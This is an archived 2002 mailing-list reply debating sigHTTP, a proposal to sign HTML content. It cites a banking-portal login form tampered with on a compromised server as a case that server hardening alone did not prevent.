Re: sigHTTP comments?

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 



Hi John,

Am Freitag den, 21. Juni 2002, um 17:00, schrieb John Stracke:

>> And at least I think you are too pessimistic by the small number of
>> interested people. I have the impression here in germany are still lots
>> of people concerned and frightend everytime some tv magazin reports
>> online banking bugs here and security frauds there. If everyone is
>> complaining how about solving it in a simple way?
>
> But this doesn't solve the actual problem--nearly all cracks of online
> banks, stores, etc., are *not* done by intercepting HTTP traffic.
> They're usually done by exploiting security bugs in the server
> software and stealing information out of the databases.  sigHTTP would
> do nothing about that; in fact, it might exacerbate the problem, by
> diverting resources that could instead be spent on securing the
> server.

Here we had already one case where an intruder changed silently the html 
programming of a banking portal.
He changed the login form in such a way that he was sent the one time 
transaction code of the money transfer and displayed an successful 
result by himself from the hijacked web server. The SSL certificate was 
of no use in this case, it even kept the user in wrong confidence.

The SigHTTP would have been a solution for this case. Changing already 
signed HTML content wold have deleted or modified the signature and a 
SigHTTP cpapable browser or third party tool would have been given the 
chance to alert the user.

The "best thing" for sure is a perfect hardened server but I think there 
must be a second layer of security.

--
Think Safety
www.security-gui.de & www.sighttp.org


[Index of Archives]     [IETF Annoucements]     [IETF]     [IP Storage]     [Yosemite News]     [Linux SCTP]     [Linux Newbies]     [Fedora Users]